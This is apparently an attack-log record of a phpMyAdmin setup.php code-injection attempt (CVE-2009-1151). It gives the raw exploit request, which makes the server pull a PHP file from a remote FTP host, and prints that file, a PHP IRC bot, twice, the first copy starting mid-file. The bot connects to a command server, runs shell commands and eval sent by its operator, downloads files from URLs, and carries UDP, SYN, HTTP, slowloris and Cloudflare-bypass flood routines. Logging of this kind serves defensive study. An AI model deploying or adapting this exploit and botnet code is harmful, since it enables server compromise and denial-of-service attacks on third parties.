if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2Bitch Got Nulled!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2HttpFlood Finished!\2]");
}
public function proxyhttpflood($url, $proxyListUrl, $time, $method="GET") {
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Started!\2]");
$timei = time();
//Grabbing proxy
$proxyList = curl($proxyListUrl);
if ($proxyList) {
$proxies = explode("\n", $proxyList);
if (count($proxies)) {
shuffle($proxies);
$proxies[0] = trim($proxies[0]);
$proxy = explode(":", $proxies[0]);
$proxyIp = $proxy[0];
$proxyPort = $proxy[1];
if ($proxyPort && $proxyIp) {
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($proxyIp, $proxyPort, $errno, $errstr, 1);
fwrite($handle, $packet);
}
} else {
$this->privmsg($this->config['chan'], "[\2Malformed proxy!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2No proxies found!\2]");
}
} else {
$this->privmsg($this->config['chan'], "[\2Proxy List not found!\2]");
}
$this->privmsg($this->config['chan'], "[\2ProxyHttpFlood Finished (Proxy: ".$proxies[0].")!\2]");
}
public function tcpflood($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TCP Started!\2]");
$timei = time();
$packet = "";
for ($i = 0; $i < 65000; $i++) {
$packet .= $this->charset[rand(0, strlen($this->charset))];
}
while (time() - $timei < $time) {
$handle = fsockopen("tcp://".$host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2TCP Finished!\2]");
}
public function slowRead($host, $port, $time) {
$timei = time();
$fs = array();
//initialize get headers.
$this->privmsg($this->config['chan'], "[\2Started Slowread!\2]");
$headers = "GET / HTTP/1.1\r\nHost: {$host}\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\n\r\n";
while (time() - $timei < $time) {
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
while (time() - $timei < $time) {
for ($i = 0; $i < count($fs); $i++) {
if (!$fs[$i]) {
$fs[$i] = @fsockopen($host, $port, $errno, $errstr);
fwrite($fs[$i], $headers);
}
fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "[\2UdpFlood Started!\2]");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "[\2UdpFlood Finished!\2]: " . $env . " MB sent / Average: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2TcpConn Started!\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
51.159.7.51
Dest. port: 80
Time: 20/08/2019 08:49:02
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS12876 ONLINE S.A.S.
Location: Île-de-France, Clichy-sous-Bois (zipcode 93390)
rDNS: 51-159-7-51.rev.poneytelecom.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 238
cookie2: $Version="1"
Host: 28.34.203.167
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://28.34.203.167/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=057cc0957a214ba23a3b4d124f889ac2
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=61bd6ddddc4a7aa715855e90d8f9c2ee&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F195%2E154%2E86%2E34%2Fpub%2Fx%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: b4e8a307ebdedcc21fffdd8628b2d881
Type: text/x-php
Size: 37412
URL: ftp://195.154.86.34/pub/x.php
<?php
$cfg = array(
"server" => "195.154.86.34",
"port" => "6969",
"key" => "",
"prefix" => "VNSTAT|",
"maxrand" => "8",
"chan" => "#b0atn3t",
"trigger" => ".",
"hostauth" => "*"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
